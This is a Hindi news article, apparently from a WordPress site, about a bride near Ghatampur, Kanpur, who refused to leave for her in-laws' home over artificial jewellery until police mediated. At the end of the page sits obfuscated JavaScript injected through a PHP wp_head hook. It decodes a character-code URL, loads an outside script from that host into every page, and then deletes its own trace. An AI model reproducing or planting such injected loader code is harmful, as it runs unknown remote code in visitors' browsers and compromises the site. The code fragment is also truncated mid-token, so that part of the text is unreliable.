Saturday, July 27, 2024
spot_img

मैं सुसराल नहीं जाऊंगी! दूल्हे की ओर से शादी में आए नकली जेवर देख दुल्हन हुई आग बबूला, सुसराल जानें से किया इंकार, जानिए फिर कैसे हुई विवाद

कानपुर स्थित घाटमपुर के साढ़ थानाक्षेत्र के एक गांव में शादी समारोह के बीच उस समय अफरा तफरी मच गई, जब ससुराल से आए जेवर देखकर नाराज दुल्हन ने विदाई के बाद ससुराल जाने से इन्कार कर दिया।
जिसके बाद दूल्हा व दुल्हन पक्ष के बीच आपस में विवाद शुरू हो गया और मामला पुलिस तक जा पहुंचा और फिर पंचायत के बाद बात बनी।
जानकारी के मुताबिक बिरहर चौकी क्षेत्र के एक गांव में बिधनू क्षेत्र के एक गांव से बरात आई थी। नाचते गाते बराती दुल्हन के दरवाजे पहुंचे तो जनातियों ने अगवानी करने के बाद द्वारचार की रस्म अदा की। इसके बाद जयमाला की रस्म अदा की हुई , दूल्हा और दुल्हन ने एक दूसरे को जयमाला पहनाई।
जिसके बाद दुल्हन मंडप में पहुंची और चढ़ावे की रस्म हुई, लेकिन जैसे ही दुल्हन को यह बात पता चली तो वो भड़क गई। चढ़ावे में नकली जेवर जाने पर दुल्हन ने ससुराल जाने से इन्कार कर दिया। कन्या पक्ष ने वर पक्ष से चढ़ावे में कुछ ज्वैलरी आर्टिफिशियल लाने की बात कही। इसपर विवाद शुरू हो गया और हंगामा हो गया।
जिसके बाद कन्या पक्ष ने दूल्हे को बैठाकर असली ज्वैलरी की मांग की और न देने पर दुल्हन को विदा करने से मना कर दिया। जानकारी पाकर साढ़ थाना पुलिस भी मौके पर पहुंची। जिसके बाद पुलिस ने बमुश्किल दोनो पक्षों को शांत कर आपस में समझौता करवाया। जिसके बाद दुल्हन की विदाई हो सकी।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>